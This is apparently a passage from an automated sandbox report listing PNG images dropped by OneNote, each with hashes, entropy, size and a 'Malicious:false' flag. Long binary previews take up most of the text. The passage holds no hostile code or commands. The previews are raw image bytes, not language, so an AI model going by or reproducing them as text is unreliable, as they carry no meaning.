                                                                                                        Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11332
                                                                                                        Entropy (8bit):7.9324721568775285
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                        MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                        SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                        SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                        SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.943341403425058
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                        MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                        SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                        SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                        SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2599
                                                                                                        Entropy (8bit):7.903700862190034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                        MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                        SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                        SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                        SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1570
                                                                                                        Entropy (8bit):7.780157858994452
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                        MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                        SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                        SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                        SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4490
                                                                                                        Entropy (8bit):7.928016176674318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                        MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                        SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                        SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                        SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11449
                                                                                                        Entropy (8bit):7.91552812501629
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                        MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                        SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                        SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                        SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3679
                                                                                                        Entropy (8bit):7.931319059366604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                        MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                        SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                        SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                        SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):7.837610270261933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                        MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                        SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                        SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                        SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13084
                                                                                                        Entropy (8bit):7.940058639272698
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                        MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                        SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                        SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                        SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4847
                                                                                                        Entropy (8bit):7.950192613458318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                        MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                        SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                        SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                        SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
